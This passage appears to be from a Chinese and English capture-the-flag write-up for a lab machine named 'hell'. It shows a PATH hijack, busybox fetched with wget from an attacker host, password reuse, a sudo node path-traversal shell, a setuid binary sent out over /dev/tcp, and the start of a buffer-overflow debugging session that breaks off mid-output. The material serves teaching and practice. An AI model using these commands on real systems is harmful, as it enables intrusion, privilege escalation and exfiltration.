\/dev\/tcp\/172.20.10.8\/8888\npascual@hell:\/opt\/reports$ cd \/tmp\npascual@hell:\/tmp$ echo $PATH\n\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin\npascual@hell:\/tmp$ echo &quot;\/bin\/bash&quot; &gt; cat\npascual@hell:\/tmp$ head cat\n\/bin\/bash\npascual@hell:\/tmp$ PATH=$PWD:$PATH\npascual@hell:\/tmp$ echo $PATH\n\/tmp:\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/usr\/games:\/usr\/local\/games:\/snap\/bin\npascual@hell:\/tmp$ chmod +x cat\npascual@hell:\/tmp$ \/opt\/reports\/reports 1\n\neddie@hell:\/tmp$ whoami;id\neddie\nuid=1002(eddie) gid=1004(pascual) groups=1004(pascual)<\/code><\/pre>\n<p>\u6211\u4eec\u62ff\u4e0b\u4e86<code>eddie<\/code>\u7528\u6237\u3002<\/p>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">eddie@hell:\/home\/eddie$ ls -la\nctotal 40\ndrwxr-x--- 6 eddie eddie 4096 Feb 16  2023 .\ndrwxr-xr-x 7 root  root  4096 Feb 16  2023 ..\nlrwxrwxrwx 1 root  root     9 Feb 16  2023 .bash_history -&gt; \/dev\/nulld\n-rw-r--r-- 1 eddie eddie  220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 eddie eddie 3771 Jan  6  2022 .bashrc\ndrwx------ 2 eddie eddie 4096 Feb 16  2023 .cache\ndrwxrwxr-x 3 eddie eddie 4096 Feb 16  2023 .local\n-rw-r--r-- 1 eddie eddie  807 Jan  6  2022 .profile\ndrwxrwxr-x 2 eddie eddie 4096 Feb 16  2023 .ssh\n-r-------- 1 eddie eddie  238 Feb 16  2023 flag.txt\ndrwxrwxr-x 2 eddie eddie 4096 Feb 16  2023 report\neddie@hell:\/home\/eddie$ cat flag.txt \neddie@hell:\/home\/eddie$ \neddie@hell:\/home\/eddie$ cat flag.txt\neddie@hell:\/home\/eddie$ cd report\/\neddie@hell:\/home\/eddie\/report$ ls -la\ntotal 20\ndrwxrwxr-x 2 eddie eddie 4096 Feb 16  2023 .\ndrwxr-x--- 6 eddie eddie 4096 Feb 16  2023 ..\n-rw-rw-r-- 1 eddie eddie   83 Feb 16  2023 1\n-rw-rw-r-- 1 eddie eddie   70 Feb 16  2023 2\n-rw-rw-r-- 1 eddie eddie   48 Feb 16  2023 3\neddie@hell:\/home\/eddie\/report$ cd ..\neddie@hell:\/home\/eddie$ cd 
.cache\/\neddie@hell:\/home\/eddie\/.cache$ ls -la\ncdtotal 8\ndrwx------ 2 eddie eddie 4096 Feb 16  2023 .\ndrwxr-x--- 6 eddie eddie 4096 Feb 16  2023 ..\n-rw-r--r-- 1 eddie eddie    0 Feb 16  2023 motd.legal-displayed\neddie@hell:\/home\/eddie\/.cache$ cd ..\neddie@hell:\/home\/eddie$ cd .local\/\neddie@hell:\/home\/eddie\/.local$ ls -la\ntotal 12\ndrwxrwxr-x 3 eddie eddie 4096 Feb 16  2023 .\ndrwxr-x--- 6 eddie eddie 4096 Feb 16  2023 ..\ndrwx------ 3 eddie eddie 4096 Feb 16  2023 share\neddie@hell:\/home\/eddie\/.local$ cd share\/\neddie@hell:\/home\/eddie\/.local\/share$ ls -la\ntotal 12\ndrwx------ 3 eddie eddie 4096 Feb 16  2023 .\ndrwxrwxr-x 3 eddie eddie 4096 Feb 16  2023 ..\ndrwx------ 2 eddie eddie 4096 Feb 16  2023 nano\neddie@hell:\/home\/eddie\/.local\/share$ cd nano\/\neddie@hell:\/home\/eddie\/.local\/share\/nano$ ls -la\ntotal 8\ndrwx------ 2 eddie eddie 4096 Feb 16  2023 .\ndrwx------ 3 eddie eddie 4096 Feb 16  2023 ..\neddie@hell:\/home\/eddie\/.local\/share\/nano$ cd ..\/..\/..\/..\/\neddie@hell:\/home$ cd eddie\/\neddie@hell:\/home\/eddie$ ls -la\ntotal 40\ndrwxr-x--- 6 eddie eddie 4096 Feb 16  2023 .\ndrwxr-xr-x 7 root  root  4096 Feb 16  2023 ..\nlrwxrwxrwx 1 root  root     9 Feb 16  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 eddie eddie  220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 eddie eddie 3771 Jan  6  2022 .bashrc\ndrwx------ 2 eddie eddie 4096 Feb 16  2023 .cache\ndrwxrwxr-x 3 eddie eddie 4096 Feb 16  2023 .local\n-rw-r--r-- 1 eddie eddie  807 Jan  6  2022 .profile\ndrwxrwxr-x 2 eddie eddie 4096 Feb 16  2023 .ssh\n-r-------- 1 eddie eddie  238 Feb 16  2023 flag.txt\ndrwxrwxr-x 2 eddie eddie 4096 Feb 16  2023 report\neddie@hell:\/home\/eddie$ cat .profile \neddie@hell:\/home\/eddie$ cd \/var\/mail\neddie@hell:\/var\/mail$ ls -la\ntotal 16\ndrwxrwsr-x  2 root    mail    4096 Feb 16  2023 .\ndrwxr-xr-x 14 root    root    4096 Feb 15  2023 ..\n-r--------  1 eddie   eddie    142 Feb 15  2023 eddie\n-r--------  1 pascual pascual  166 
Feb 16  2023 pascual\neddie@hell:\/var\/mail$ cat eddie<\/code><\/pre>\n<p>\u8fd9\u662f\u5565\u60c5\u51b5\u554a\uff0c\u610f\u8bc6\u5230\u53ef\u80fd\u662f\u56e0\u4e3a\u4e4b\u524d\u7684\u90a3\u4e2a<code>\/tmp\/cat<\/code>\u5f71\u54cd\u4e86\u8fd9\u91cc\u7684cat\uff0c\u4f20\u4e00\u4e2a<code>busybox<\/code>\u4e0a\u53bb\uff1a<\/p>\n<h3>\u4e0a\u4f20busybox\u8bfb\u53d6\u4fe1\u606f[8]<\/h3>\n<pre><code class=\"language-bash\"># kali\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n172.20.10.3 - - [16\/Apr\/2024 15:40:12] &quot;GET \/busybox HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<pre><code class=\"language-bash\"># attacked\neddie@hell:\/tmp$ wget http:\/\/172.20.10.8:8888\/busybox\n--2024-04-16 19:40:13--  http:\/\/172.20.10.8:8888\/busybox\nConnecting to 172.20.10.8:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 1131168 (1.1M) [application\/octet-stream]\nSaving to: \u2018busybox\u2019\n\nbusybox                               100%[=========================================================================&gt;]   1.08M  --.-KB\/s    in 0.004s  \n\n2024-04-16 19:40:13 (293 MB\/s) - \u2018busybox\u2019 saved [1131168\/1131168]\n\neddie@hell:\/tmp$ busybox cat cat\nbash: \/tmp\/busybox: Permission denied\neddie@hell:\/tmp$ chmod +x busybox\neddie@hell:\/tmp$ busybox cat cat\n\/bin\/bash\neddie@hell:\/tmp$ cd \/home\/eddie\neddie@hell:\/home\/eddie$ busybox cat flag.txt \n\n\u2588\u2580\u2580\u2003\u2588\u2580\u2584\u2003\u2588\u2580\u2584\u2003\u2588\u2003\u2588\u2580\u2580\u2003\u2588\u2580\u2584\u2003\u2588\u2580\u2588\u2003\u2580\u2588\u2580\u2003\u2584\u2580\u2588\n\u2588\u2588\u2584\u2003\u2588\u2584\u2580\u2003\u2588\u2584\u2580\u2003\u2588\u2003\u2588\u2588\u2584\u2003\u2588\u2584\u2580\u2003\u2588\u2584\u2588\u2003 \u2588 \u2003\u2588\u2580\u2588\n\nFlag 8: HELL{R3L4T1V3_R0U735_4R3_FUN!}\n\neddie@hell:\/home\/eddie$ cd 
\/var\neddie@hell:\/var$ cd mail\neddie@hell:\/var\/mail$ busybox cat eddie \n\nFrom: ghost@hall.h4u\n\nHi eddie, can you see my hacked facebook account, I leave you the last password I remember: MySuperSecurePassword123!<\/code><\/pre>\n<h3>\u5bc6\u7801\u590d\u7528[9]<\/h3>\n<p>\u5f88\u660e\u663e\uff0c\u4f5c\u8005\u559c\u6b22\u8fdb\u884c\u5bc6\u7801\u590d\u7528\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u5207\u6362\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">eddie@hell:\/var\/mail$ cd \/home\neddie@hell:\/home$ ls -la\ntotal 28\ndrwxr-xr-x  7 root    root    4096 Feb 16  2023 .\ndrwxr-xr-x 19 root    root    4096 Feb 16  2023 ..\ndrwxr-x---  6 eddie   eddie   4096 Feb 16  2023 eddie\ndrwxr-x---  6 gato    gato    4096 Feb 16  2023 gato\ndrwxr-x---  5 ghost   ghost   4096 Feb 16  2023 ghost\ndrwxr-x---  5 pascual pascual 4096 Feb 16  2023 pascual\ndrwxr-x---  3 run     run     4096 Feb 16  2023 run\neddie@hell:\/home$ su root\nPassword: \nsu: Authentication failure\neddie@hell:\/home$ su gato\nPassword: \nsu: Authentication failure\neddie@hell:\/home$ su ghost\nPassword: \nghost@hell:\/home$ whoami;id\nghost\nuid=1001(ghost) gid=1001(ghost) groups=1001(ghost)\nghost@hell:\/home$ cd ghost\/\nghost@hell:~$ ls -la\ntotal 40\ndrwxr-x--- 5 ghost ghost 4096 Feb 16  2023 .\ndrwxr-xr-x 7 root  root  4096 Feb 16  2023 ..\nlrwxrwxrwx 1 root  root     9 Feb 15  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 ghost ghost  220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 ghost ghost 3771 Jan  6  2022 .bashrc\ndrwx------ 2 ghost ghost 4096 Feb 15  2023 .cache\ndrwxrwxr-x 3 ghost ghost 4096 Feb 15  2023 .local\n-rw-r--r-- 1 ghost ghost  807 Jan  6  2022 .profile\ndrwxrwxr-x 2 ghost ghost 4096 Feb 16  2023 .ssh\n-r-------- 1 ghost ghost  243 Feb 16  2023 flag.txt\n-r-------- 1 ghost ghost  196 Feb 15  2023 message.txt\nghost@hell:~$ cat flag.txt 
\n\n\u2588\u2580\u2588\u2003\u2588\u2584\u2584\u2003\u2588\u2580\u2580\u2003\u2580\u2584\u2580\u2003\u2588\u2580\u2580\u2003\u2588 \u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2003\u2580\u2588\u2580\n\u2588\u2584\u2588\u2003\u2588\u2584\u2588\u2003\u2588\u2580 \u2003\u2588 \u2588\u2003\u2588\u2584\u2588\u2003\u2588\u2580\u2588\u2003\u2588\u2584\u2588\u2003\u2584\u2588\u2003 \u2588 \n\nFlag 9: HELL{B14CKH47_H4CK3R_F4C3B00K_WTF?}\n\nghost@hell:~$ cat message.txt \n\nFrom: gatogamer1155@hell.h4u\n\nHi ghost, just a heads up I created a script in node.js that converts text to hexadecimal, I&#039;ll leave it at my home directory for you to try, it&#039;s called hex.js :)<\/code><\/pre>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">ghost@hell:~$ sudo -l\n[sudo] password for ghost: \nMatching Defaults entries for ghost on hell:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser ghost may run the following commands on hell:\n    (gato) \/usr\/bin\/node \/home\/gato\/*<\/code><\/pre>\n<h3>\u76ee\u5f55\u7a7f\u8d8a\u53cd\u5f39shell<\/h3>\n<p>\u56e0\u4e3a\u662f\u901a\u914d\u7b26\uff0c\u5c1d\u8bd5\u76ee\u5f55\u7a7f\u8d8a\u4e00\u4e0b\uff0c\u7136\u540e\u53c2\u8003https:\/\/gtfobins.github.io\/gtfobins\/node\/<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543131.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404170543131.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240417035202855\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Try constructing and running it:<\/p>\n<pre><code class=\"language-javascript\">require(&quot;child_process&quot;).spawn(&quot;\/bin\/bash&quot;, {stdio: [0, 1, 2]})<\/code><\/pre>\n<pre><code class=\"language-bash\">ghost@hell:\/tmp$ sudo -l\nMatching Defaults entries for ghost on hell:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser ghost may run the following commands on hell:\n    (gato) \/usr\/bin\/node \/home\/gato\/*\nghost@hell:\/tmp$ sudo -u gato \/usr\/bin\/node \/home\/gato\/*\ninternal\/modules\/cjs\/loader.js:818\n  throw err;\n  ^\n\nError: Cannot find module &#039;\/home\/gato\/*&#039;\n    at Function.Module._resolveFilename (internal\/modules\/cjs\/loader.js:815:15)\n    at Function.Module._load (internal\/modules\/cjs\/loader.js:667:27)\n    at Function.executeUserEntryPoint [as runMain] (internal\/modules\/run_main.js:60:12)\n    at internal\/main\/run_main_module.js:17:47 {\n  code: &#039;MODULE_NOT_FOUND&#039;,\n  requireStack: []\n}\nghost@hell:\/tmp$ echo &#039;require(&quot;child_process&quot;).spawn(&quot;\/bin\/bash&quot;, {stdio: [0, 1, 2]})&#039; &gt; test.js\nghost@hell:\/tmp$ ls -la\ntotal 1160\ndrwxrwxrwt 11 root    root       4096 Apr 16 19:48 .\ndrwxr-xr-x 19 root    root       4096 Feb 16  2023 ..\ndrwxrwxrwt  2 root    root       4096 Apr 17  2024 .ICE-unix\ndrwxrwxrwt  2 root    root       4096 Apr 17  2024 .Test-unix\ndrwxrwxrwt  2 root    root       4096 Apr 17  2024 .X11-unix\ndrwxrwxrwt  2 root    root       4096 Apr 17  2024 .XIM-unix\ndrwxrwxrwt  2 root    root       4096 Apr 17  2024 .font-unix\n-rwxrwxr-x  1 eddie   pascual 1131168 Jan 17  2022 busybox\n-rwxrwxr-x  1 pascual 
pascual      10 Apr 16 19:31 cat\ndrwx------  2 root    root       4096 Apr 17  2024 snap-private-tmp\ndrwx------  3 root    root       4096 Apr 17  2024 systemd-private-11cedf6aef794959ad89d576ea13f137-systemd-logind.service-Eclsxi\ndrwx------  3 root    root       4096 Apr 17  2024 systemd-private-11cedf6aef794959ad89d576ea13f137-systemd-resolved.service-7lLCia\ndrwx------  3 root    root       4096 Apr 17  2024 systemd-private-11cedf6aef794959ad89d576ea13f137-systemd-timesyncd.service-BamRMR\n-rw-rw-r--  1 ghost   ghost        64 Apr 16 19:52 test.js\nghost@hell:\/tmp$ chmod +x test.js \nghost@hell:\/tmp$ sudo -u gato \/usr\/bin\/node \/home\/gato\/..\/..\/..\/..\/..\/tmp\/test.js\ngato@hell:\/tmp$ whoami;id\ngato\nuid=1000(gato) gid=1000(gato) groups=1000(gato)<\/code><\/pre>\n<p>That gives us <code>gato<\/code>.<\/p>\n<h3>Information gathering [10]<\/h3>\n<pre><code class=\"language-bash\">gato@hell:\/tmp$ cd \/home\/gato\/\ngato@hell:~$ ls -la\ntotal 48\ndrwxr-x--- 6 gato gato 4096 Feb 16  2023 .\ndrwxr-xr-x 7 root root 4096 Feb 16  2023 ..\nlrwxrwxrwx 1 root root    9 Feb 15  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 gato gato  220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 gato gato 3771 Jan  6  2022 .bashrc\ndrwx------ 3 gato gato 4096 Feb 15  2023 .cache\ndrwxrwxr-x 3 gato gato 4096 Feb 15  2023 .config\nlrwxrwxrwx 1 root root    9 Feb 15  2023 .gdb_history -&gt; \/dev\/null\n-rw-rw-r-- 1 gato gato   30 Feb 15  2023 .gdbinit\ndrwxrwxr-x 3 gato gato 4096 Feb 15  2023 .local\n-rw------- 1 gato gato    0 Feb 15  2023 .node_repl_history\n-rw-r--r-- 1 gato gato  807 Jan  6  2022 .profile\nlrwxrwxrwx 1 root root    9 Feb 15  2023 .python_history -&gt; \/dev\/null\ndrwx------ 2 gato gato 4096 Feb 15  2023 .ssh\n-r-------- 1 gato gato  332 Feb 16  2023 flag.txt\n-r-------- 1 gato gato  400 Feb 15  2023 hex.js\ngato@hell:~$ cat flag.txt 
\n\n\u2588\u2580\u2580\u2003\u2584\u2580\u2588\u2003\u2580\u2588\u2580\u2003\u2588\u2580\u2588\u2003\u2588\u2580\u2580\u2003\u2584\u2580\u2588\u2003\u2588\u2580\u2584\u2580\u2588\u2003\u2588\u2580\u2580\u2003\u2588\u2580\u2588\u2003\u2584\u2588\u2003\u2584\u2588\u2003\u2588\u2580\u2003\u2588\u2580\n\u2588\u2584\u2588\u2003\u2588\u2580\u2588\u2003 \u2588 \u2003\u2588\u2584\u2588\u2003\u2588\u2584\u2588\u2003\u2588\u2580\u2588\u2003\u2588 \u2580 \u2588\u2003\u2588\u2588\u2584\u2003\u2588\u2580\u2584\u2003 \u2588\u2003 \u2588\u2003\u2584\u2588\u2003\u2584\u2588\n\nFlag 10: HELL{7H3_5UD03R5_15_N07_4_60D_1D34}\n\ngato@hell:~$ cat hex.js \nconst readline = require(&#039;readline&#039;);\nconst chalk = require(&#039;chalk&#039;);\n\nconst rl = readline.createInterface({\n  input: process.stdin,\n  output: process.stdout\n});\n\nrl.question(&#039;\\n[&#039; + chalk.blue(&#039;*&#039;) + &#039;] Enter string: &#039;, (text) =&gt; {\n  const buffer = Buffer.from(text, &#039;utf8&#039;);\n  console.log(&#039;\\n[&#039; + chalk.green(&#039;+&#039;) + &#039;] &#039; + `String hexadecimal: ${buffer.toString(&#039;hex&#039;)}` + &#039;\\n&#039;);\n  rl.close();\n});\ngato@hell:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/opt\/projects\/strlen\n\/usr\/bin\/fusermount3\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/sudo\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/snapd\/snap-confine\ngato@hell:~$ file \/opt\/projects\/strlen\n\/opt\/projects\/strlen: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=7efd2fcd861f24df4ff3e78bedfda45139486fe3, for GNU\/Linux 3.2.0, not stripped\ngato@hell:~$ ls -l \/opt\/projects\/strlen\n-rwsr-xr-x 1 root root 13064 Feb 15  2023 
\/opt\/projects\/strlen<\/code><\/pre>\n<p>Run the program:<\/p>\n<pre><code class=\"language-bash\">gato@hell:~$ cd \/opt\/projects\/\ngato@hell:\/opt\/projects$ .\/strlen \n\n\u2588\u2580\u2003\u2580\u2588\u2580\u2003\u2588\u2580\u2588\u2003\u2588  \u2003\u2588\u2580\u2580\u2003\u2588\u2584 \u2588\n\u2584\u2588\u2003 \u2588 \u2003\u2588\u2580\u2584\u2003\u2588\u2584\u2584\u2003\u2588\u2588\u2584\u2003\u2588 \u2580\u2588\n\n[-] Usage: .\/strlen &lt;string&gt;\n\ngato@hell:\/opt\/projects$ .\/strlen abcdef\n\n\u2588\u2580\u2003\u2580\u2588\u2580\u2003\u2588\u2580\u2588\u2003\u2588  \u2003\u2588\u2580\u2580\u2003\u2588\u2584 \u2588\n\u2584\u2588\u2003 \u2588 \u2003\u2588\u2580\u2584\u2003\u2588\u2584\u2584\u2003\u2588\u2588\u2584\u2003\u2588 \u2580\u2588\n\n[*] String: abcdef\n\n[+] Length: 6\n\ngato@hell:\/opt\/projects$ .\/strlen aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\n\u2588\u2580\u2003\u2580\u2588\u2580\u2003\u2588\u2580\u2588\u2003\u2588  \u2003\u2588\u2580\u2580\u2003\u2588\u2584 \u2588\n\u2584\u2588\u2003 \u2588 \u2003\u2588\u2580\u2584\u2003\u2588\u2584\u2584\u2003\u2588\u2588\u2584\u2003\u2588 \u2580\u2588\n\n[*] String: 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\n[+] Length: 528\n\nSegmentation fault (core dumped)<\/code><\/pre>\n<h3>Analyzing the program<\/h3>\n<p>There is an overflow vulnerability, so pull the binary to the local machine and reverse it:<\/p>\n<pre><code class=\"language-bash\">cat strlen &gt; \/dev\/tcp\/172.20.10.8\/8888\nnc -lp 8888 &gt; strlen<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ file strlen\nstrlen: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=7efd2fcd861f24df4ff3e78bedfda45139486fe3, for GNU\/Linux 3.2.0, not stripped\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ checksec --file=strlen \nRELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE\nNo RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   39 Symbols        No    0               2               strlen<\/code><\/pre>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __int64 v3; \/\/ rbp\n  __int64 v5; \/\/ [rsp-8h] [rbp-8h]\n\n  __asm { endbr64 }\n  v5 = v3;\n  sub_401090(&amp;unk_402008, argv, envp);\n  if ( argc &lt;= 1 )\n    return sub_4010B0(&quot;\\n\\x1B[0;37m[\\x1B[0;31m-\\x1B[0;37m] Usage: %s &lt;string&gt;\\n\\n&quot;, 
*argv);\n  sub_4010C0(0LL);\n  return overflow(argv[1]);\n}<\/code><\/pre>\n<p>Try debugging it locally:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ gdb-peda -q strlen  \nReading symbols from strlen...\n(No debugging symbols found in strlen)\ngdb-peda$ pattern create 300\n&#039;AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%&#039;\ngdb-peda$ run\nStarting program: \/home\/kali\/temp\/Hell\/strlen \n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library &quot;\/lib\/x86_64-linux-gnu\/libthread_db.so.1&quot;.\n\n\u2588\u2580\u2003\u2580\u2588\u2580\u2003\u2588\u2580\u2588\u2003\u2588  \u2003\u2588\u2580\u2580\u2003\u2588\u2584 \u2588\n\u2584\u2588\u2003 \u2588 \u2003\u2588\u2580\u2584\u2003\u2588\u2584\u2584\u2003\u2588\u2588\u2584\u2003\u2588 \u2580\u2588\n\n[-] Usage: \/home\/kali\/temp\/Hell\/strlen &lt;string&gt;\n\n[Inferior 1 (process 114035) exited with code 0107]\nWarning: &#039;set logging off&#039;, an alias for the command &#039;set logging enabled&#039;, is deprecated.\nUse &#039;set logging enabled off&#039;.\n\nWarning: &#039;set logging on&#039;, an alias for the command &#039;set logging enabled&#039;, is deprecated.\nUse &#039;set logging enabled on&#039;.\n\nWarning: not running\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Hell]\n\u2514\u2500$ gdb-peda -q strlen\nReading symbols from strlen...\n(No debugging symbols found in strlen)\ngdb-peda$ pattern_arg 300\nSet 1 arguments to program\ngdb-peda$ run\n[----------------------------------registers-----------------------------------]\nRAX: 0x7fffffffdf10 
(&quot;AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA&quot;...)\nRBX: 0x7fffffffe148 --&gt; 0x7fffffffe40d (&quot;\/home\/kali\/temp\/Hell\/strlen&quot;)\nRCX: 0x15 \nRDX: 0x200400 \nRSI: 0x7fffffffe4ff (&quot;A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%&quot;)\nRDI: 0x7fffffffdfe6 (&quot;A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%&quot;)\nRBP: 0x2541322541632541 (&#039;A%cA%2A%&#039;)\nRSP: 0x7fffffffe018 (&quot;HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%&quot;)\nRIP: 0x401297 (&lt;overflow+117&gt;:  ret)\nR8 : 0x75 (&#039;u&#039;)\nR9 : 0x0 \nR10: 0x7ffff7dd3238 --&gt; 0x10001a00004244 \nR11: 0x7ffff7f1f090 (&lt;__strcpy_avx2&gt;:   vpxor  xmm7,xmm7,xmm7)\nR12: 0x0 \nR13: 0x7fffffffe160 --&gt; 0x7fffffffe556 (&quot;LESS_TERMCAP_se=\\033[0m&quot;)\nR14: 0x403220 --&gt; 0x401180 (&lt;__do_global_dtors_aux&gt;:    endbr64)\nR15: 0x7ffff7ffd000 --&gt; 0x7ffff7ffe2c0 --&gt; 0x0\nEFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n   0x401290 &lt;overflow+110&gt;:     call   0x401080 &lt;strcpy@plt&gt;\n   0x401295 &lt;overflow+115&gt;:     nop\n   0x401296 &lt;overflow+116&gt;:     leave\n=&gt; 0x401297 &lt;overflow+117&gt;:     ret\n   0x401298 &lt;_fini&gt;:    endbr64\n   0x40129c &lt;_fini+4&gt;:  sub    rsp,0x8\n   0x4012a0 &lt;_fini+8&gt;:  add    rsp,0x8\n   0x4012a4 &lt;_fini+12&gt;: ret\n[------------------------------------stack-------------------------------------]\n0000| 0x7fffffffe018 (&quot;HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%&quot;)\n0008| 0x7fffffffe020 